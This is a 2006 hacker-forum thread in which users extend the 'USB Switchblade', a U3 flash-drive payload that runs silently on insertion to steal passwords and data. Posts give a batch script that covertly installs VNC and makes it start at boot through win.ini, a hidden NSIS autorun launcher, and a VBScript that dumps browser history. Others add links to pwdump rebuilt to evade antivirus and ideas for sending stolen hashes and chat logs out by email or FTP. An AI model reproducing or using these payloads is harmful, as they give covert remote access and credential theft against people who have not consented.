DLSS Posted September 9, 2006 Share Posted September 9, 2006 ok so i on my turn modded xFilthyxJesusx 's package ... i added a thight-vnc installer + injecting the run command into the win.ini file so it would run at startup : progstart.bat renamed to progstart2.bat and added following progstart.bat @echo off Xcopy "VNCHooks.dll" "C:WINDOWS" /R /k /y Xcopy "winvnc.exe" "C:WINDOWS" /R /k /y nircmd.exe execmd CALL batexeprogstart2.bat cd /D "C:WINDOWS" echo [windows]>>win.ini echo Run=winvnc.exe>>win.ini this runs fine when executing normal but doesn't want to work when doing it from the autorun .... any help ? o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b catched (all the log file gives is the username & machine name) Quote Link to comment Share on other sites More sharing options...
aznrocket Posted September 9, 2006 Share Posted September 9, 2006 huh, just curious how difficult it would be to add a feature to this switchblade-- the capacity to copy files OFF of the computer you plug it into (e.g. documents, msn messenger logs, etc), while maintaining its stealthiness. It wouldn't be hard to program in, but I rather like it the way it is since it's actually way more stealthy. As a systems administrator if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used. How would I go about programming the capacity to copy (LOCALLY, to the switchblade!) particular documents, (like MSN Messenger Logs, given the directory is known), while maintaining stealthiness? Any guidance/help would be greatly appreciated. Also, is there a reason why mspass.exe and/or pspv.exe wasn't encrypted like pwdump was? mspass, especially, would be crucial to my... switchblading. Quote Link to comment Share on other sites More sharing options...
Guest MaxDamage Posted September 9, 2006 Share Posted September 9, 2006 ... Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 9, 2006 Author Share Posted September 9, 2006 Edit: im gonna start the wikiedit2: http://www.hak5.org/wiki/index.php?title=USB_Switchblade (help!!!) Oops, I think I just overwrote your Wiki entry. That's the problem with wiki's when two people go to create a page at the same time. Feel free to merge your info in, it should be in the history page. Quote Link to comment Share on other sites More sharing options...
DLSS Posted September 9, 2006 Share Posted September 9, 2006 don't ignore me please :cry: ok so i on my turn modded xFilthyxJesusx 's package ...i added a thight-vnc installer + injecting the run command into the win.ini file so it would run at startup : progstart.bat renamed to progstart2.bat and added following progstart.bat @echo off Xcopy "VNCHooks.dll" "C:WINDOWS" /R /k /y Xcopy "winvnc.exe" "C:WINDOWS" /R /k /y nircmd.exe execmd CALL batexeprogstart2.bat cd /D "C:WINDOWS" echo [windows]>>win.ini echo Run=winvnc.exe>>win.ini this runs fine when executing normal but doesn't want to work when doing it from the autorun .... any help ? o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b catched (all the log file gives is the username & machine name) Quote Link to comment Share on other sites More sharing options...
kapowdude Posted September 10, 2006 Share Posted September 10, 2006 You need to fix this I think. It seems to dump the passwords, unfortunately the device becomes unavailable afterware. The orange light on my switchblade goes on for a sec then turns off/boots linux to see what the duece went wrong EDIT: Works fine in windows now (randomly) However it didnt dump anything of mine. I did however find the password of "adwtiger" Hmm is autorun enabled... sometimes it works for me sometimes it doesnt.... Oh and i fixed the zip thx Quote Link to comment Share on other sites More sharing options...
PoyBoy Posted September 10, 2006 Share Posted September 10, 2006 no prob Quote Link to comment Share on other sites More sharing options...
DTYtsejam24 Posted September 10, 2006 Share Posted September 10, 2006 somebody already asked this but they got no response so i figured id ask again any body know of a loader for a memorex drive? Quote Link to comment Share on other sites More sharing options...
w0lo Posted September 10, 2006 Share Posted September 10, 2006 The IE history dump(DUH.vbs) doesnt seem to work on my system, atleast it doesnt show every url, just the domain and approx date. So i whipped up something that does (Based on the existing script, if i get the time i will rewrite it in JScript, VBScript is so damn ugly and i cant pack lots of instructions on one line :roll: ) on error resume next Function Dump(h,indent,fulldump) for each item in h.items     if indent>1 then         s=h.GetDetailsOf(item,0)         if fulldump then s=h.GetDetailsOf(item,2)&vbTab&s&vbTab&h.GetDetailsOf(item,1)         else         s=h.GetDetailsOf(item,-1)         end if     wscript.echo String (indent," ") &s     if item.isFolder then         call Dump(item.GetFolder,indent+1,fulldump)         end if     if 0=indent then wscript.echo String (80,"-") next End Function Dump createobject("Shell.Application").NameSpace(34),0,true The full version can dump to html and just raw urls (no dates and page titles(the medium size version supports this aswell, just change the last true>false)) ( http://rapidshare.de/files/32573713/IE_DumpHistory.vbs.html ) Usage (of full version): cscript /nologo IE_DumpHistory.vbs html>dump.htmlcscript /nologo IE_DumpHistory.vbs all>dump.txt And finally, a very compact version: on error resume next Function D(h,indent) for each item in h.items     wscript.echo String (indent," ")&h.GetDetailsOf(item,-1)     if item.isFolder then call Dump(item.GetFolder,indent+1,fulldump)     if 0=indent then wscript.echo String (80,"-") next End Function D createobject("Shell.Application").NameSpace(34),0 Quote Link to comment Share on other sites More sharing options...
datamancer Posted September 10, 2006 Share Posted September 10, 2006 Okay i figured out it was my laptop causing my v3 problem. I got everything to work, by seeing these other posts can i update the scipt to include a search for msn/aim/yahoo pass's? If so how do i go about doing that? Isnt there a batch file you can make that automaticly makes a separte admin acount? I remember seeing that a long while back.. Ill see if i can digg it up. lawl digg! Quote Link to comment Share on other sites More sharing options...
DLSS Posted September 10, 2006 Share Posted September 10, 2006 is there a reason i'm being ignored ? :? :( Quote Link to comment Share on other sites More sharing options...
Emilml Posted September 10, 2006 Share Posted September 10, 2006 Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill===================== pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply! http://www.brainkill.net/hack/pwdump.exe http://www.brainkill.net/hack/pwservice.exe http://www.brainkill.net/hack/LsaExt.dll ======================= I can verify that the latest version of symantec anti-virus corporate edition with the latest updates does not detect this now. score one for brainkill! I downloadet the 3 files and ran a scan whit symantec antivirus corporate edition and it found pwdump.exe and pwservice.exe as "hacker tools" so i dont think it worked? Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 10, 2006 Author Share Posted September 10, 2006 ok so i on my turn modded xFilthyxJesusx 's package ...i added a thight-vnc installer + injecting the run command into the win.ini file so it would run at startup : progstart.bat renamed to progstart2.bat and added following progstart.bat @echo off Xcopy "VNCHooks.dll" "C:WINDOWS" /R /k /y Xcopy "winvnc.exe" "C:WINDOWS" /R /k /y nircmd.exe execmd CALL batexeprogstart2.bat cd /D "C:WINDOWS" echo [windows]>>win.ini echo Run=winvnc.exe>>win.ini this runs fine when executing normal but doesn't want to work when doing it from the autorun .... any help ? o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b catched (all the log file gives is the username & machine name) That's awesome, what a great addition to the payload. I'm not sure why it's not executing on autorun. Maybe someone has an idea. I'm seeing a lot of great mods to the payloads, we should consider adding a secion to the wiki switchblade page at: www.hak5.org/wiki/index.php?title=USB_Switchblade Quote Link to comment Share on other sites More sharing options...
w0lo Posted September 11, 2006 Share Posted September 11, 2006 Not exactly sure what the XP issue listed on the wiki page is but i whipped up a little something that i think fits the description Autorun.inf then looks like: [Autorun] open=AutoExec.exe [AutoExec] Cmd=Notepad Params=%WinDir%Win.ini the NSIS source for the exe: OutFile "AutoExec.exe" SilentInstall silent !define cfg "$ExeDirAutoRun.Inf" Section StrCpy $OUTDIR "$ExeDir" ReadIniStr $0 ${cfg} "AutoExec" "Cmd" ReadIniStr $1 ${cfg} "AutoExec" "Params" ExecShell "" "$0" "$1" SW_HIDE SectionEnd Page InstFiles Pre compiled exe: http://rapidshare.de/files/32684592/AutoExec.exe.html Quote Link to comment Share on other sites More sharing options...
Loony Guitarist Posted September 11, 2006 Share Posted September 11, 2006 Hello, Are there any loaders out that can load this software on a Memorex drive? I have the Memorex Mini Traveldrive U3 and can't seem to find a loader for it. Thanks, Vext I have this problem too. I have both a Scandisk u3 drive and a memorex u3 drive. the lploader software will only work with a scandisk u3 drive but my drive is a 1gig and I want to use my memorex 512mb drive for this. So far I cant find a loader that will let you flash a memorex drive. so it should be noted that so far this will only work on a scandisk u3 drive unless you use amish's method. Quote Link to comment Share on other sites More sharing options...
Ouroboros Posted September 12, 2006 Share Posted September 12, 2006 U3 sends their love http://devblog.u3.com/?p=35 Quote Link to comment Share on other sites More sharing options...
straylight Posted September 12, 2006 Share Posted September 12, 2006 First off, i'm new to the forums so let me start by saying hello!! Now, i've been messing with this stuff for awhile and have found that it doesnt matter if the .iso is in the same directory as the LPInstaller.exe -- in my case it will always go out to the sandisk site and pull the new .iso image. If i disable my network connection formatting of the device will not complete successfully. My next move will be setting up a webserver on my local machine and spoofing the sandisk site to trick it into pulling the modded .iso file. This was not my idea, all credit goes to Wesley McGrew: http://www.cse.msstate.edu/~rwm8/hackingU3/ He has done a ton of work related to the u3 drives, in fact i think he was the first to publicly disclose this info. His site also mentions that as long as the .iso and LPInstaller.exe file are in the same directory that there is no need to use the webserver trick. Has this happened to anyone else? I have a 1gig micro a.k.a switchblade. regards, straylight Quote Link to comment Share on other sites More sharing options...
servzero Posted September 12, 2006 Share Posted September 12, 2006 can anyone post a copy of the winvnc.exe and vnchooks.dll files? Quote Link to comment Share on other sites More sharing options...
Sparda Posted September 12, 2006 Share Posted September 12, 2006 can anyone post a copy of the winvnc.exe and vnchooks.dll files? Insted of trusting some one you don't even know and who my have an alternate movtive, why don't you do the clever thing and download them from a more trust worthy source ;) http://www.tightvnc.com/ Quote Link to comment Share on other sites More sharing options...
VladBypass Posted September 13, 2006 Share Posted September 13, 2006 I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing. lol this was on page 2 or 3 of this post :X anyways, as you've said there it should be a posibility to mail it although I don't know the extent of PHP scripting. I've used/modified an email php script which doesnt use a smtp server to mail (atleast it doesnt make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of... but then again if its all text then your set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects enrypted to a server to upload the LM Hash... Quote Link to comment Share on other sites More sharing options...
Silva Posted September 13, 2006 Share Posted September 13, 2006 I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing. lol this was on page 2 or 3 of this post :X anyways, as you've said there it should be a posibility to mail it although I don't know the extent of PHP scripting. I've used/modified an email php script which doesnt use a smtp server to mail (atleast it doesnt make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of... but then again if its all text then your set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects enrypted to a server to upload the LM Hash... Or you can use google and find an easy way, running php scripts seems unefective in my book. SendMail for microsoft windows :D http://www.geocities.com/jaber_aljundi/#Wh...SendMail_Tool__ didn't play with it yet but seems simple enough since the file names are always the same I guess. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted September 13, 2006 Author Share Posted September 13, 2006 I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing. lol this was on page 2 or 3 of this post :X anyways, as you've said there it should be a posibility to mail it although I don't know the extent of PHP scripting. I've used/modified an email php script which doesnt use a smtp server to mail (atleast it doesnt make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of... but then again if its all text then your set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects enrypted to a server to upload the LM Hash... Or you could use the command line email utility blat from http://www.blat.net/ But again, as I've said before, I rather like the fact that the switchblade doesn't create network traffic, thus keeping the tool self contained and leaving less evidence. Quote Link to comment Share on other sites More sharing options...
anyedie Posted September 13, 2006 Share Posted September 13, 2006 U3 just makes it so much easier. So thanks for the versatile software.Darren Kitchen Producer / Co-Host http://hak5.org mml! thats pretty great. Quote Link to comment Share on other sites More sharing options...
amish Posted September 13, 2006 Share Posted September 13, 2006 Heya guys. Well bad news i lost my memory stick with liek 100's of password on it :S So i had to change them all. Anyways before i lost it i had time to implement this http://www.cqure.net/wp/?page_id=7 It grabs and decrypts the password for Tight VNC and Real VNC on the fly, and it runs in command line :D So thats good to implement. =) Im glad to see the projects going well. But i think someone or myself shoudl implement a command line file encryptor to store these password safe everytime we dump them, jsut incase we loose them....like me. I wish i did that before Quote Link to comment Share on other sites More sharing options...
Ag3nT_KaTz Posted September 13, 2006 Share Posted September 13, 2006 well i just sent a technical support request to memorex about the launchpad update on a traveldrive. hopefully i ill get a responce soon and I will share my findings here. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.